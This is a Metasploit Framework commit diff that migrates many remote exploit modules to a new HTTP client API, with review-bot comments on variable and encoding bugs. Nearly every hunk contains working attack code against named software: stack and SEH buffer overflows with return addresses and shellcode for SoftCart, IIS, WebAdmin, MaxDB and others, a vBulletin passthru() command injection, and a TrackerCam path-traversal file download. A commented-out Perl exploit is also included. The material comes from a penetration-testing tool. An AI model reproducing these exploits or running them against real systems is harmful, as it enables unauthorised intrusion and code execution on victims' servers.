Integration of the new HTTP Client API

git-svn-id: file:///home/svn/framework3/trunk@4241 4d416f70-5f16-0410-b530-b9f4589650da
HD Moore 2006-12-28 23:42:36 +00:00
parent e60e7bede3
commit b221af7791
17 changed files with 158 additions and 356 deletions


@ -59,8 +59,7 @@ class Exploits::Bsdi::Softcart::Softcart01 < Msf::Exploit::Remote
end
def brute_exploit(address)
print_status("Trying #{"%.8x" % address['Ret']}...")
buffer =
"MAA+scstoreB" +
rand_text_alphanumeric(512) +
@ -69,227 +68,14 @@ class Exploits::Bsdi::Softcart::Softcart01 < Msf::Exploit::Remote
[address['Ret'] + payload.encoded.length].pack('V') +
payload.encoded
connect('global' => true)
req = client.request(
'uri' => datastore['URI'] + "?" + buffer)
client.send_request(req)
print_status("Trying #{"%.8x" % address['Ret']}...")
res = send_request_raw({
'uri' => datastore['URI'],
'query' => buffer
}, 5)
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::mercantec_softcart;
use strict;
use base "Msf::Exploit";
my $advanced =
{
'StackBottom' => [ '', 'Start address for stack ret.' ],
'StackTop' => [ '', 'Stop address for stack ret.' ],
'StackStep' => [ 0, 'Number of bytes to increment between steps.' ],
'BruteWait' => [ 0, 'Number of seconds to wait between steps.' ],
};
my $info =
{
'Name' => 'Mercantec SoftCart CGI Overflow',
'Version' => '$Revision: 3110 $',
'Authors' =>
[
'skape <mmiller [at] hick.org>',
'trew <trew [at] exploit.us>'
],
'Description' =>
qq{
This is an exploit for an undisclosed buffer overflow
in the SoftCart.exe CGI as shipped with Mercantec's shopping
cart software. It is possible to execute arbitrary code by
passing a malformed CGI parameter in an HTTP GET request.
This issue is known to affect SoftCart version 4.00b.
},
'Arch' => [ 'x86' ],
'OS' => [ 'bsdi' ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [ 1, 'ADDR', 'The target HTTP server address' ],
'RPORT' => [ 1, 'PORT', 'The target HTTP server port', 80 ],
'VHOST' => [ 1, 'DATA', 'The target HTTP virtual host', 'auto' ],
'URI' => [ 1, 'DATA', 'The target CGI URI', '/cgi-bin/SoftCart.exe' ],
},
'Payload' =>
{
'Space' => 1000, # tons
'MinNops' => 16,
'BadChars'=> "\x09\x0a\x0b\x0c\x0d\x20\x27\x5c\x3c\x3e" .
"\x3b\x22\x60\x7e\x24\x5e\x2a\x26\x7c\x7b" .
"\x7d\x28\x29\x3f\x5d\x5b\x00",
'PrependEncoder' => "\x83\xec\x7f", # sub $0x7f, %esp
},
'Refs' =>
[
['OSVDB', '9011'],
['MIL', '38'],
],
'DefaultTarget' => -1,
'Targets' =>
[
# Name Bottom/Ret Top
[ 'BSDi/4.3 Bruteforce', 0xefbf3000, 0xefbffffc ],
[ 'BSDi/4.3', 0xefbf4b8e, 0x0 ],
],
'Keys' => ['softcart'],
'DisclosureDate' => 'Aug 19 2004',
};
sub new
{
my $class = shift;
my $self;
$self = $class->SUPER::new(
{
'Info' => $info,
'Advanced' => $advanced,
},
@_);
return $self;
}
#
# We must fork our child before doing fun stuff.
#
sub PayloadPrepend
{
my $self = shift;
return "\x6a\x02\x58\x50\x9a\x00\x00\x00\x00\x07\x00" .
"\x85\xd2\x75\x0a\x31\xc0\x40\x9a\x00\x00\x00" .
"\x00\x07\x00";
}
sub Exploit
{
my $self = shift;
my $targetIdx = $self->GetVar('TARGET');
my $payload = $self->GetVar('EncodedPayload');
my $shellcode = $payload->Payload;
my $target = $self->Targets->[$targetIdx];
my $ret = $target->[1];
my $valid;
$self->PrintLine('[*] Trying exploit target ' . $target->[0]);
if ($target->[0] =~ /Bruteforce/)
{
my $stackTop = hex($self->GetLocal('StackTop'));
my $stackBottom = hex($self->GetLocal('StackBottom'));
my $stackStep = $self->GetLocal('StackStep');
my $wait = $self->GetLocal('BruteWait');
$stackBottom = $target->[1] if ($stackBottom == 0);
$stackTop = $target->[2] if ($stackTop == 0);
$stackStep = $payload->NopsLength if ($stackStep == 0);
$self->PrintLine(sprintf('[*] Brute forcing %.8x => %.8x (step %d)...',
$stackBottom, $stackTop, $stackStep));
# Loop through addresses, incrementing by stackStep each interval
for ($ret = $stackBottom, $valid = $ret + length($shellcode);
$ret < $stackTop;
$ret = $self->StepAddress(Address => $ret, StepSize => $stackStep, Direction => 1),
$valid = $self->StepAddress(Address => $valid, StepSize => $stackStep, Direction => 1))
{
# Wrap valid around if it goes past the top
$valid = $stackBottom if ($valid >= $stackTop);
$self->PrintLine(sprintf("[*] Trying %.8x...", $ret));
last if (not defined($self->transmitExploit(target => $target,
shellcode => $shellcode, ret => $ret, valid => $valid)));
sleep($wait);
}
}
else
{
$valid = $ret + length($shellcode);
$self->transmitExploit(target => $target,
shellcode => $shellcode, ret => $ret, valid => $valid);
}
}
sub transmitExploit
{
my $self = shift;
my ($target, $shellcode, $ret, $valid) = @{{@_}}{qw/target shellcode ret valid/};
my $targetHost = $self->GetVar('RHOST');
my $targetPort = $self->GetVar('RPORT');
my $vhost = $self->GetVar('VHOST');
my $uri = $self->GetVar('URI');
my $bof;
my $s;
$vhost = $targetHost if (not defined($vhost) or $vhost eq 'auto');
# Build payload
$bof = "MAA+scstoreB";
$bof .= "A" x (524 - length($bof));
$bof .= pack("V", $ret);
$bof .= "MSF!";
$bof .= pack("V", $valid);
$bof .= $shellcode;
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $targetHost,
'PeerPort' => $targetPort,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintError;
return;
}
# << pow! >>
$s->Send("GET $uri?$bof HTTP/1.0\r\n" .
"Host: $vhost\r\n" .
"\r\n");
return 1;
}
1;
=end
end
end
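Review bot: `res` at L27 is assigned and never read in `brute_exploit`; since a stack-smash request is followed straight by `handler`, either call `send_request_raw` bare or actually use the response, e.g. `print_status("Target answered #{res.code}") if res` to flag a non-vulnerable host. The `'query' => buffer` value carries raw bytes (`pack('V')` return addresses and `payload.encoded`, L20-L21); the removed code concatenated them into the URI verbatim, so confirm the new client does not percent-encode `'query'`, otherwise the overflow layout on the wire changes. The `=begin`/`=end` block after the method is the commented-out Perl predecessor, and the Ruby module's bad-character list is outside this hunk.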


@ -46,10 +46,12 @@ class Exploits::Multi::Realserver::Describe < Msf::Exploit::Remote
end
def check
response = request(
res = send_request_raw({
'method' => 'OPTIONS',
'proto' => 'RTSP/1.0',
'uri' => '/')
'proto' => 'RTSP',
'version' => '1.0',
'uri' => '/'
}, 5)
if response and response['Server']
print_status("Found RTSP: #{response['Server']}")
@ -65,10 +67,12 @@ class Exploits::Multi::Realserver::Describe < Msf::Exploit::Remote
encoded = payload.encoded.gsub(/./) { |char| "%%%.2x" % char[0] }
request(
res = send_request_raw({
'method' => 'DESCRIBE',
'proto' => 'RTSP/1.0',
'uri' => "/" + ("../" * 560) + "\xcc\xcc\x90\x90" + encoded + ".smi")
'proto' => 'RTSP',
'version' => '1.0',
'uri' => "/" + ("../" * 560) + "\xcc\xcc\x90\x90" + encoded + ".smi"
}, 5)
handler
end
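Review bot: `check` now stores the response in `res` (L213) but the unchanged lines at L221-L222 still test `response`, which is no longer assigned anywhere in the method, so the check fails on an undefined name instead of reporting the server. Change them to `if res and res['Server']` and `print_status("Found RTSP: #{res['Server']}")`. The `res` assigned at L226 in the exploit hunk is never read and can be dropped. `check` continues past its hunk.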


@ -16,7 +16,7 @@ class Exploits::Unix::Http::PhpvBulletinTemplateName < Msf::Exploit::Remote
is enabled. All versions of vBulletin prior to 3.0.7 are
affected.
},
'Author' => [ 'str0ke <str0ke@milw0rm.com>', 'cazz' ],
'Author' => [ 'str0ke <str0ke[at]milw0rm.com>', 'cazz' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$',
'References' => [
@ -46,22 +46,24 @@ class Exploits::Unix::Http::PhpvBulletinTemplateName < Msf::Exploit::Remote
deregister_options(
'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
)
)
end
def go(command)
wrapper = Rex::Text.rand_text_alphanumeric(rand(128)+32)
command = "echo #{wrapper};#{command};echo #{wrapper};"
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
uri = datastore['PATH'] + "?do=page&template={${passthru(#{encoded})}}";
res = request({
'uri' => datastore['PATH'],
'method' => 'GET',
})
res = send_request_cgi({
'uri' => datastore['PATH'],
'method' => 'GET',
'vars_get' =>
{
'do' => "page",
'template' => "{${passthru(#{encoded})}}"
}
}, 5)
if (res and res.body)
b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body)
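Review bot: the `uri` local built at L258 is no longer consumed: the request now takes `'uri' => datastore['PATH']` plus `'vars_get'` (L264-L270), so if that line survived the change it is dead and should be removed. Moving the `{${passthru(...)}}` template into `'vars_get'` makes the client responsible for URL-encoding the braces, `$` and parentheses; state that in a comment, e.g. `# sent via vars_get so the client URL-encodes the template's braces and parentheses`. `go` continues past the end of the hunk.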


@ -67,12 +67,12 @@ class Exploits::Unix::Http::PhpXmlrpcEval < Msf::Exploit::Remote
"</param></params>" +
"</methodCall>";
res = request({
res = send_request_cgi({
'uri' => datastore['PATH'],
'method' => 'POST',
'Content-Type' => 'application/xml',
'ctype' => 'application/xml',
'data' => xml,
})
}, 5)
if (res and res.body)


@ -50,11 +50,9 @@ class Exploits::Windows::Http::ALTN_WebAdmin_Overflow < Msf::Exploit::Remote
# Identify the target based on the WebAdmin version number
def autofilter
c = connect
req = c.request({ 'uri' => '/WebAdmin.DLL' })
res = c.send_request(req, -1)
disconnect
res = send_request_raw({
'uri' => '/WebAdmin.DLL'
}, -1)
if (res and res.body =~ /WebAdmin.*v(2\..*)$/)
case $1
@ -78,29 +76,28 @@ class Exploits::Windows::Http::ALTN_WebAdmin_Overflow < Msf::Exploit::Remote
end
def exploit
c = connect
user_cook = Rex::Text.rand_text_alphanumeric(2)
post_data = 'User=' + make_nops(168) + [target.ret].pack('V') + payload.encoded
post_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'
req = c.request({
'uri' => '/WebAdmin.DLL?View=Logon',
print_status("Sending request...")
res = send_request_cgi({
'uri' => '/WebAdmin.DLL',
'query' => 'View=Logon',
'method' => 'POST',
'content-type' => 'application/x-www-form-urlencoded',
'cookie' => "User=#{user_cook}; Lang=en; Theme=standard",
'data' => post_data,
})
'headers' =>
{
'Accept' => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png',
'Accept-Language' => 'en',
'Accept-Charset' => 'iso-8859-1,*,utf-8'
}
}, 5)
req.headers['Accept'] = 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png'
req.headers['Accept-Language'] = 'en'
req.headers['Accept-Charset'] = 'iso-8859-1,*,utf-8'
print_status("Sending request...")
res = c.send_request(req)
handler
disconnect
end
end
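Review bot: the POST at L315 still passes `'content-type' => 'application/x-www-form-urlencoded'` (L319) while the other modules in this commit switched that key to `'ctype'` (the XML-RPC and WebDAV hunks); if the new request builder only honors `'ctype'`, this header is silently dropped, so change L319 to `'ctype' => 'application/x-www-form-urlencoded'`. `res` at L315 is assigned but never read, and with `c = connect` removed the trailing `disconnect` (L336) no longer pairs with an explicit connect — keep it only if `send_request_cgi` leaves the mixin socket open for `handler`. The `-1` timeout kept at L302 presumably means "wait without limit"; if so, `autofilter` can hang on a host that accepts the connection but never answers.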


@ -230,16 +230,14 @@ class Exploits::Windows::Http::ApacheChunkedEncoding < Msf::Exploit::Remote
print_status("Trying #{target.name} [ #{"0x%.8x" % target.ret}/#{pad} ]")
# Build the request
request(
send_request_raw({
'uri' => '/',
'headers' =>
{
'Host' => "#{vhost}:#{rport}",
'Transfer-Encoding' => "CHUNKED"
},
'data' => "FFFFFFF0 " + pattern,
'timeout' => 2
)
}, 2)
# Check the handler
handler
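Review bot: the timeout moved from a named `'timeout' => 2` key to a bare positional `2` at L356, which now reads as a magic number beside the request hash; give it a name or a comment, e.g. `}, 2) # short timeout: a vulnerable server crashes rather than answering`. The explicit `'Host' => "#{vhost}:#{rport}"` header (L350) may duplicate the Host header the new client derives from `vhost` — confirm `send_request_raw` sends the supplied headers verbatim without adding its own. The enclosing method starts before the hunk.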


@ -52,12 +52,13 @@ class Exploits::Windows::Http::IaWebmail < Msf::Exploit::Remote
def exploit
print_status("Sending request...")
request(
send_request_raw({
'uri' =>
"/" + ("o" * target['Length']) +
"META" +
[target.ret].pack('V') +
payload.encoded)
payload.encoded
}, 2)
handler
end
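Review bot: the request hash at L366-L373 buries the overflow string inside a multi-line `'uri'` value; build it first — `uri = "/" + ("o" * target['Length']) + "META" + [target.ret].pack('V') + payload.encoded` — and pass `'uri' => uri`, so the buffer layout is readable and can be logged before sending. That value contains raw bytes from `pack('V')` and `payload.encoded`; the replaced `request(...)` call sent them as-is, so verify `send_request_raw` does not escape the path.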


@ -52,27 +52,27 @@ class Exploits::Windows::Http::Ipswitch_Wug_Maincfgret < Msf::Exploit::Remote
def exploit
c = connect
num = rand(65535).to_s
num = rand(65535).to_s
user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}"
req = "Authorization: Basic #{Rex::Text.encode_base64(user_pass)}\r\n\r\n"
req << "page=notify&origname=&action=return&type=Beeper&instancename="
req << Rex::Text.rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06"
req << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded
req << "&beepernumber=&upcode=" + num + "*&downcode="+ num + "*&trapcode=" + num + "*&end=end"
req = c.request({
print_status("Trying target %s..." % target.name)
res = send_request_cgi({
'uri' => '/_maincfgret.cgi',
'method' => 'POST',
'content-type' => 'application/x-www-form-urlencoded',
'data' => req,
})
'headers' =>
{
'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"
}
}, 5)
print_status("Trying target %s..." % target.name)
res = c.send_request(req)
handler
disconnect
end
end
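Review bot: `req` at L386 is appended to with `<<`, but with the Authorization header moved into `'headers'` (L398-L401) the line that previously initialized it (`req = "Authorization: Basic ...\r\n\r\n"`, L385) appears to have been removed, which leaves `req` undefined at its first use; if that line was kept instead, the POST body now starts with a stray `Authorization:` line on top of the real header. Either way, initialize the body explicitly with `req = ''` before L386 and build only form fields into it. `res` at L392 is never read, and `num` appearing twice at L382-L383 suggests a whitespace-only change to that line.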


@ -59,8 +59,6 @@ class Exploits::Windows::Http::MaxDB_WebDBM_GET_Overflow < Msf::Exploit::Remote
end
def exploit
c = connect
# Trigger the SEH by writing past the end of the page after
# the SEH is already overwritten. This avoids the other smashed
# pointer exceptions and goes straight to the payload.
@ -71,10 +69,12 @@ class Exploits::Windows::Http::MaxDB_WebDBM_GET_Overflow < Msf::Exploit::Remote
buf[3647, 4] = [target.ret].pack('V')
print_status("Trying target address 0x%.8x..." % target.ret)
res = c.send_request(c.request({ 'uri' => '/%' + buf }), -1)
send_request_raw({
'uri' => '/%' + buf
}, 5)
handler
disconnect
end
end
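Review bot: with `c = connect` removed (L415) the `disconnect` at L427 no longer pairs with an explicit connect; it is right only if `send_request_raw` leaves the mixin's socket open for `handler`, so say so — `# send_request_raw left the mixin socket open; close it after the handler runs` — or drop it. The path `'/%' + buf` (L424) deliberately starts with a bare `%`; if the new client normalizes or percent-encodes the URI, that malformed escape and the offset written at `buf[3647, 4]` (L420) stop lining up, so confirm the raw path is sent verbatim.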


@ -55,17 +55,16 @@ class Exploits::Windows::Http::Minishare_GET_Overflow < Msf::Exploit::Remote
end
def exploit
c = connect
uri = Rex::Text.rand_text_alphanumeric(target['Rets'][0])
uri << [target['Rets'][1]].pack('V')
uri << payload.encoded
print_status("Trying target address 0x%.8x..." % target['Rets'][1])
res = c.send_request(c.request({ 'uri' => uri }), -1)
send_request_raw({
'uri' => uri
}, 5)
handler
disconnect
end
end
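Review bot: the `uri` at L437-L439 concatenates `target['Rets'][1]` as packed raw bytes and `payload.encoded` into the request path; the removed `c.request`/`c.send_request` pair sent that verbatim, so confirm `send_request_raw` neither escapes nor truncates the path, or the return address lands at the wrong offset. `disconnect` at L446 stays although `c = connect` was dropped — keep it only if the API leaves a socket open for `handler`. Dropping the previously captured `res` is fine since it was never read.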


@ -57,7 +57,10 @@ class Exploits::Windows::Http::Shoutcast_Format < Msf::Exploit::Remote
end
def check
r = request('uri' => '/')
r = send_request_raw({
'uri' => uri
}, 5)
return Exploit::CheckCode::Safe if not r
m = r.body.match(/Network Audio Server\/([^\s]+)\s+([^<]+)<BR/)
@ -86,7 +89,9 @@ class Exploits::Windows::Http::Shoutcast_Format < Msf::Exploit::Remote
uri << '#0100x.mp3'
print_status("Trying to exploit target #{target.name} 0x%.8x" % target.ret)
res = request({ 'uri' => uri })
send_request_raw({
'uri' => uri
}, 5)
handler
disconnect
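Review bot: `check` now requests `'uri' => uri` (L457), but `uri` is not defined in `check` — the replaced call used `'/'`, and the `uri` local belongs to the exploit method (L462) — so the check raises on an undefined name unless the mixin happens to provide a `uri` method. Restore `'uri' => '/'`. The exploit hunk correctly drops the unused `res`; its method continues outside the hunk.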


@ -67,9 +67,10 @@ class Exploits::Windows::Http::TrackerCam_PHPArg_Overflow < Msf::Exploit::Remote
end
def check
c = connect
req = c.request({ 'uri' => '/tuner/ComGetLogFile.php3?fn=../HTTPRoot/socket.php3' })
res = c.send_request(req, -1)
res = send_request_raw({
'uri' => '/tuner/ComGetLogFile.php3',
'query' => 'fn=../HTTPRoot/socket.php3'
}, 5)
if (res and res.body =~ /fsockopen/)
fp = fingerprint()
@ -86,19 +87,22 @@ class Exploits::Windows::Http::TrackerCam_PHPArg_Overflow < Msf::Exploit::Remote
seh = generate_seh_payload(target.ret)
buf[257, seh.length] = seh
uri = "/tuner/TunerGuide.php3?userID=#{buf}"
print_status("Sending request...")
res = c.send_request(c.request({ 'uri' => uri }), -1)
res = send_request_raw({
'uri' => '/tuner/TunerGuide.php3',
'query' => 'userID=' + buf
}, 5)
handler
disconnect
end
def download(path)
c = connect
req = c.request({ 'uri' => '/tuner/ComGetLogFile.php3?fn=' + ("../" * 10) + path })
res = c.send_request(req, -1)
res = send_request_raw({
'uri' => '/tuner/ComGetLogFile.php3',
'query' => 'fn=' + ("../" * 10) + path
}, 5)
return if not (res and res.body and res.body =~ /tuner\.css/ and res.body =~ /<pre>/)
m = res.match(/<pre>(.*)<\/pre><\/body>/smi)
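Review bot: `download` (L498) splices `path` into `'query' => 'fn=' + ("../" * 10) + path` without encoding; the removed version appended it to the URI the same way, so behavior is preserved, but if `send_request_raw` sends the query verbatim a `path` containing `&`, `#` or spaces is truncated or misparsed. Record the contract — `# path is sent unencoded; callers pass plain relative file names` — or encode it. `res` at L491 in the exploit is assigned and never read; `download` continues past the hunk.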


@ -75,7 +75,13 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
"<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" +
"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"
response = request({ 'uri' => "/#{url}", 'content-type' => 'text/xml', 'method' => 'SEARCH', 'data' => xml}, 5)
response = send_request_cgi({
'uri' => '/' + uri,
'ctype' => 'text/xml',
'method' => 'SEARCH',
'data' => xml
}, 5)
if (response and response.body =~ /Server Error\(exception/)
return Exploit::CheckCode::Vulnerable
@ -83,7 +89,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
# Did the server stop acceping requests?
begin
request({ 'uri' => '/'} )
send_request_raw({'uri' => '/'}, 5)
rescue
return Exploit::CheckCode::Vulnerable
end
@ -93,7 +99,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
def exploit
# verify the service is running up front
request({'uri' => '/'})
send_request_raw({'uri' => '/'}, 5)
if datastore['HTTP::junk_pipeline'] > 0
print_status('junk pipelined exploitation requests may not work. If exploitation fails, try disabling pipelining')
@ -139,10 +145,15 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
url[ 283, 2 ] = ret
begin
request({ 'uri' => "/#{url}", 'content-type' => 'text/xml', 'method' => 'SEARCH', 'data' => xml}, nil)
send_request_cgi({
'uri' => url,
'ctype' => 'text/xml',
'method' => 'SEARCH',
'data' => xml
}, 5)
handler
rescue => e
print_error("attempt failed: #{e.to_s}")
print_error("Attempt failed: #{e.to_s}")
end
1.upto(8) { |i|
@ -163,7 +174,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
print_status('Checking if IIS is back up after a failed attempt...')
1.upto(20) {|i|
begin
request({'uri' => '/'})
send_request_raw({'uri' => '/'}, 5)
rescue
print_status("Connection failed (#{i} of 20)...")
sleep(2)
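Review bot: the SEARCH in the check method now targets `'/' + uri` (L516) whereas the replaced line used `"/#{url}"`, and the one in `exploit` targets plain `url` (L543) without the leading `/` the replaced line had; unless `url` is built with a leading slash outside these hunks, the exploit request goes to a different path than before, and `uri` may be undefined in the check. Use `'uri' => '/' + url` in both places. Both enclosing methods start before their hunks.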


@ -70,23 +70,23 @@ class Exploits::Windows::Isapi::IIS_FP30REG_Chunked < Msf::Exploit::Remote
if (i % 3 == 0)
print_status("Refreshing the remote DLLHost.exe process...")
c.send_request(c.request({ 'uri' => datastore['URL'] }), -1)
send_request_raw({
'uri' => datastore['URL']
}, -1)
end
print_status("Trying to exploit fp30reg.dll (request #{i.to_s} of 15)")
send_request_raw({
'uri' => datastore['URL'],
'method' => 'POST',
'headers' =>
{
'Transfer-Encoding' => 'Chunked'
},
'data' => "DEAD\r\n#{pat}\r\n0\r\n"
}, 5)
c.connect
s = c.conn
print_status("Trying to exploit fp30reg.dll (#{i.to_s} of 15)")
req =
"POST #{datastore['URL']} HTTP/1.1\r\n" +
"Host: #{datastore['VHOST'] || datastore['RHOST']}\r\n" +
"Transfer-Encoding: Chunked\r\n\r\n" +
"DEAD\r\n" +
pat + "\r\n" +
"0\r\n"
s.put(req)
sock.put(req)
sleep(1)
handler
@ -95,10 +95,10 @@ class Exploits::Windows::Isapi::IIS_FP30REG_Chunked < Msf::Exploit::Remote
end
def check
c = connect
print_status("Refreshing the remote DLLHost.exe process...")
r = c.send_request(c.request({ 'uri' => datastore['URL'] }), -1)
disconnect
print_status("Requesting the vulnerable ISAPI path...")
r = send_request_raw({
'uri' => datastore['URL']
}, -1)
if (r and r.code == 501)
return Exploit::CheckCode::Detected
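Review bot: after the new chunked `send_request_raw` POST at L575-L583, the loop still ends with a `.put(req)` (L594/L595 — one of the two is the surviving line) that re-sends a hand-built request; if the `req = "POST ..."` block (L587-L593) was removed, `req` is undefined there, and if it was kept the exploit fires twice per iteration. Drop the `put` and the manual request string, leaving `send_request_raw` followed by `sleep(1)` and `handler`. The loop begins before the hunk.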


@ -58,9 +58,9 @@ class Exploits::Windows::Isapi::IIS_NSIISLOG_Overflow < Msf::Exploit::Remote
end
def check
c = connect
req = c.request({ 'uri' => datastore['URL'] })
res = c.send_request(req, -1)
r = send_request_raw({
'uri' => datastore['URL']
}, -1)
if (res and res.body =~ /NetShow ISAPI/)
return Exploit::CheckCode::Detected
@ -70,9 +70,7 @@ class Exploits::Windows::Isapi::IIS_NSIISLOG_Overflow < Msf::Exploit::Remote
def exploit_target(target)
c = connect
buf = ''
vars = {}
%w{
date time c-dns cs-uri-stem c-starttime
x-duration c-rate c-status c-playerid c-playerversion
@ -86,17 +84,15 @@ class Exploits::Windows::Isapi::IIS_NSIISLOG_Overflow < Msf::Exploit::Remote
pat[ target['Rets'][0] - 4, seh.length] = seh
buf << pat
req = c.request({
print_status("Sending request...")
res = send_request_cgi({
'uri' => datastore['URL'],
'method' => 'POST',
'user-agent' => 'NSPlayer/2.0',
'content-type' => 'application/x-www-form-urlencoded',
'data' => buf,
})
print_status("Sending request...")
c.send_request(req, 0)
'data' => buf
}, 5)
handler
disconnect
end
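Review bot: `check` now stores the response in `r` (L620) but the unchanged test at L623 reads `res`, which no longer exists in the method, so the check raises instead of matching `/NetShow ISAPI/`; change L620 to `res = send_request_raw({`. In `exploit_target`, the POST keeps the `'user-agent'` and `'content-type'` keys (L641-L642) while other hunks in this commit moved to `'ctype'`; confirm the new builder honors these spellings or the `NSPlayer/2.0` agent and form content type are silently lost. `res` at L638 is never read.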


@ -62,8 +62,11 @@ class Exploits::Windows::Isapi::RSA_WebAgent_Redirect < Msf::Exploit::Remote
end
def check
c = connect
r = c.send_request(c.request({ 'uri' => datastore['URL'] + '?GetPic?image=msf' }))
r = send_request_raw({
'uri' => datastore['URL'],
'query' => 'GetPic?image=msf'
}, -1)
if (r and r.body and r.body =~ /RSA Web Access Authentication/)
return Exploit::CheckCode::Detected
end
@ -71,14 +74,16 @@ class Exploits::Windows::Isapi::RSA_WebAgent_Redirect < Msf::Exploit::Remote
end
def exploit
c = connect
pat = Rex::Text.rand_text_alphanumeric(8192).gsub(/\d|Z/i, 'A')
pat = Rex::Text.rand_text_alphanumeric(8192).gsub(/\d|Z/i, 'A') # HACK
seh = generate_seh_payload(target['Rets'][1])
pat[target['Rets'][0]-4, seh.length] = seh
c.send_request(c.request({ 'uri' => datastore['URL'] + '?Redirect?url=' + pat }))
r = send_request_raw({
'uri' => datastore['URL'],
'query' => 'Redirect?url=' + pat
}, 5)
handler
disconnect
end
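Review bot: both requests place a second `?` inside `'query'` (`'GetPic?image=msf'`, L662; `'Redirect?url=' + pat`, L678) because the ISAPI expects `URL?GetPic?image=...`; if the new client percent-encodes query values that inner `?` becomes `%3F` and the handler is no longer selected, so confirm `'query'` is emitted verbatim. The `# HACK` marker added at L672 should say what it works around, e.g. `# digits and Z are stripped from the pattern (presumably bad chars for this target — confirm)`. `r` at L676 is never read.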


@ -59,11 +59,9 @@ class Exploits::Windows::Isapi::IIS_W3WHO_Overflow < Msf::Exploit::Remote
# Identify the target based on the IIS version
def autofilter
c = connect
req = c.request({ 'uri' => datastore['URL'] })
res = c.send_request(req, -1)
disconnect
res = send_request_raw({
'uri' => datastore['URL']
}, -1)
# Was a vulnerable system detected?
if (res and res.body =~ /Access Token/)
@ -82,36 +80,32 @@ class Exploits::Windows::Isapi::IIS_W3WHO_Overflow < Msf::Exploit::Remote
end
def check
c = connect
req = c.request({ 'uri' => datastore['URL'] })
res = c.send_request(req, -1)
require 'pp'
pp res
res = send_request_raw({
'uri' => datastore['URL']
}, -1)
if (res and res.body =~ /Access Token/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
c = connect
buf = Rex::Text.rand_text_english(8192, payload_badchars)
buf[target['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
buf[target['Rets'][0] - 0, 4] = [ target['Rets'][1] ].pack('V')
buf[target['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
buf[target['Rets'][0] - 4 - payload.encoded.length, payload.encoded.length] = payload.encoded
url = datastore['URL'] + '?' + buf
req = c.request({ 'uri' => url })
print_status("Sending request...")
c.send_request(req, 0)
r = send_request_raw({
'uri' => datastore['URL'],
'query' => buf
}, 5)
handler
disconnect
end
end
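Review bot: `buf` (L716-L720) holds raw jump opcodes and a packed return address and is now passed as `'query' => buf` (L727); the replaced line appended it to the URL verbatim, so the offsets in `target['Rets']` only hold if `send_request_raw` does not percent-encode the query — confirm, or the SEH layout shifts. Removing the debugging `require 'pp'`/`pp res` lines from `check` is the right call. `r` at L725 is assigned and never read, and `disconnect` at L730 now follows no explicit `connect`.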